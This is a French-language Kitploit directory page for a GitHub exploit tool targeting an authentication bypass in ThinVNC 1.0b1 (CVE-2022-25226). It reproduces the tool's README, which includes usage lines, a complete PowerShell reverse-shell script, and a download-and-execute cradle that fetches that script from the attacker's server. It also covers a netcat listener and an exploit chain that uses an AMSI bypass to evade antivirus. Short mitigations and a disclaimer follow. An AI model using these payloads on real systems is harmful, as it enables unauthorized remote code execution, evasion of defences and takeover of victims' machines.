Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2022-25226 — Script d'exploitation Python pour le contournement d'authentification ThinVNC 1.0b1 (CVE-2022-25226) qui enchaîne l'accès non authentifié au point de terminaison /cmd avec le contournement AMSI et l'injection de presse-papiers pour fournir un shell inversé. | Kitploit
Outils/GitHubGitHub/krill-x7/cve-2022-25226
ExploitationExploitation d'Applications WebCommandement et ContrôleAuthentificationApprentissage et ÉducationOutil d'Accès à DistanceDéveloppement de Charges Utiles
GitHubkrill-x7/cve-2022-25226

CVE-2022-25226

Script d'exploitation Python pour le contournement d'authentification ThinVNC 1.0b1 (CVE-2022-25226) qui enchaîne l'accès non authentifié au point de terminaison /cmd avec le contournement AMSI et l'injection de presse-papiers pour fournir un shell inversé.

Voir le dépôt
11il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

ThinVNC 1.0b1 - Contournement d'authentification menant à l'exécution de code à distance (CVE-2022-25226)

Auteur : krill-x7
Référence : https://fluidattacks.com/advisories/sinatra


Présentation

ThinVNC 1.0b1 contient une vulnérabilité de contournement d'authentification (CVE-2022-25226) permettant à des attaquants distants d'interagir avec le backend sans authentification. En exploitant les points d'accès /cmd exposés, les attaquants peuvent simuler des frappes clavier, ouvrir PowerShell, contourner l'AMSI et exécuter des commandes arbitraires, menant finalement à une exécution de code à distance (RCE).

Ce script enchaîne ces primitives pour obtenir un shell inversé sur le système cible.


Avertissement

Ce code est fourni à des fins éducatives uniquement.
Utilisez-le uniquement sur des systèmes dont vous êtes propriétaire ou que vous êtes explicitement autorisé à tester.


Prérequis

  • Python 3
  • Script de shell inversé rev.ps1 hébergé sur votre machine attaquante
  • Un écouteur (ex. Netcat) pour récupérer le shell

  • Utilisation

    root@kitploit:~
    python3 thinvnc_rce.py -t <IP_CIBLE> -tp <PORT_CIBLE> -a <IP_ATTAQUANT> -ap <PORT_ATTAQUANT>
    

    Exemple

    root@kitploit:~
    python3 thinvnc_rce.py -t 192.168.1.100 -tp 8080 -a 192.168.1.200 -ap 8000
    

    Configuration du payload

    1. Créer rev.ps1

    Enregistrez ceci dans un fichier nommé rev.ps1.
    Important : Remplacez 192.168.1.200 et 8000 par l'IP et le port d'écoute de votre attaquant.

    root@kitploit:~
    $client = New-Object System.Net.Sockets.TCPClient("192.168.1.200",8000);
    $stream = $client.GetStream();
    [byte[]]$bytes = 0..65535|%{0};
    while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){
      $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);
      $sendback = (iex $data 2>&1 | Out-String );
      $sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';
      $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);
      $stream.Write($sendbyte,0,$sendbyte.Length);
      $stream.Flush()
    }
    $client.Close()
    

    2. Héberger rev.ps1

    Depuis le même répertoire :

    root@kitploit:~
    python3 -m http.server 8000
    

    3. Démarrer un écouteur

    root@kitploit:~
    nc -lvnp 8000
    

    Déroulement de l'exploit

    1. Obtenir un SID valide via une requête non authentifiée à /cmd?cmd=connect.
    2. Démarrer ce SID avec l'accès clavier/souris via /cmd?cmd=start.
    3. Envoyer la combinaison de touches Ctrl+Échap pour ouvrir le menu Démarrer.
    4. Lancer PowerShell en mode contournement.
    5. Contourner l'AMSI pour désactiver les protections PowerShell.
    6. Exécuter le payload de shell inversé depuis votre serveur HTTP.

    Exécution du payload

    Voici le payload exécuté en mémoire :

    root@kitploit:~
    IEX((New-Object System.Net.WebClient).DownloadString('http://<IP_ATTAQUANT>:<PORT>/rev.ps1'))
    

    Remplacez <IP_ATTAQUANT> et <PORT> par votre IP et port réels.


    Remarques

    • Le payload est exécuté via une injection de commande basée sur le presse-papiers.
    • Un contournement AMSI est inclus pour échapper aux détections antivirus basées sur PowerShell.
    • ThinVNC exécute PowerShell avec les permissions utilisateur par défaut — s'il est exécuté en tant qu'administrateur, le shell est élevé.

    Mitigations

    • N'exposez pas ThinVNC sur Internet.
    • Bloquez le point d'accès /cmd via la configuration du serveur web ou un WAF.
    • Passez à des alternatives sécurisées et supportées (ex. Apache Guacamole).
    • Surveillez l'utilisation de PowerShell et les comportements d'injection via le presse-papiers.

    Crédits

    • Exploit et automatisation : krill-x7
    • Découverte de la vulnérabilité et avis : Fluid Attacks – Advisory Sinatra
    Télécharger l’outil